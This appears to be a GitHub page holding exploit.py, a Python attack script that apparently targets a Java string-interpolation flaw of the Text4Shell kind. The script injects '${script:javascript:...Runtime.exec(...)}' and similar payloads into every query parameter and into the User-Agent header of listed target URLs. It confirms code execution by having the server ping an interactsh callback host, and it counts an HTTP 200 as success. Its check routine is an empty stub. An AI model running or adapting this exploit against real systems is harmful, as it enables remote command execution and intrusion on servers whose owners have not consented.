-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathexploit.py
More file actions
82 lines (76 loc) · 3.69 KB
/
exploit.py
File metadata and controls
82 lines (76 loc) · 3.69 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import argparse
import requests
from urllib.parse import urlparse, urlunparse, quote
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class Exploit:
def __init__(self, host, targets, interactsh_host, proxy):
self.host = host
self.targets = targets
self.proxy = proxy
self.interactsh_host = interactsh_host
def run(self):
session = requests.Session()
session.proxies = {"http": self.proxy}
command = f"ping -c 1 {self.interactsh_host}"
payloads = ["${script:javascript:java.lang.Runtime.getRuntime().exec('" + command + "')}",
"${url:UTF-8:java.lang.Runtime.getRuntime().exec('" + command + "')}",
"${dns:address:java.lang.Runtime.getRuntime().exec('" + command + "')}"]
print(f"{bcolors.OKGREEN}[+] Payload generated{bcolors.ENDC}")
host_parser = urlparse(self.host)
for target in self.targets:
print(f"{bcolors.OKGREEN}[+] Attaching payload to {target}{bcolors.ENDC}")
parsed_url = urlparse(target)
if parsed_url.query:
query_payload = [0] * len(payloads)
for payload in payloads:
queries = parsed_url.query.split('&')
query_index = 0
while query_index < len(queries):
queries[query_index] = queries[query_index].split("=")[0] + "=" + payload
query_index += 1
query_param = "&".join(queries)
url = urlunparse((host_parser.scheme, host_parser.netloc, parsed_url.path, '', quote(query_param,"=&"), ''))
response = session.get(url)
if response.status_code == 200:
print(f"{bcolors.OKGREEN}[+] Attack in query parameter Successful{bcolors.ENDC}")
elif response.status_code == 404:
print(f"{bcolors.OKGREEN}[-] Invalid Target{bcolors.ENDC}")
for payload in payloads:
header = {"User-Agent": quote(payload,"=")}
response = session.get(f"{self.host}{target}", headers=header)
if response.status_code == 200:
print(f"{bcolors.OKGREEN}[+] Attack in User-Agent header Successful{bcolors.ENDC}")
elif response.status_code == 404:
print(f"{bcolors.OKGREEN}[-] Invalid Target{bcolors.ENDC}")
def check(self, file):
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--host", "-u", required=True, help="Host Url with scheme", type=str)
parser.add_argument("--input", "-i", help="full path of the file containing potential targets", type=str)
parser.add_argument("--target", "-t", help="Path of the single target (without hostname)", type=str)
parser.add_argument("--interactsh", "-v", required=True, help="Interactsh host - used to validate", type=str)
parser.add_argument("--proxy", "-p", help="Proxy details", default="", type=str)
args = parser.parse_args()
if args.input and not args.target:
file = open(args.input)
targets = file.readlines()
exploit = Exploit(args.host, targets, args.interactsh, args.proxy)
exploit.run()
exploit.check("todo")
elif args.target:
targets = [args.target]
exploit = Exploit(args.host, targets, args.interactsh, args.proxy)
exploit.run()
exploit.check("todo")
else:
print(f"{bcolors.FAIL}[-]Provide any and only one of --input and --target{bcolors.ENDC}")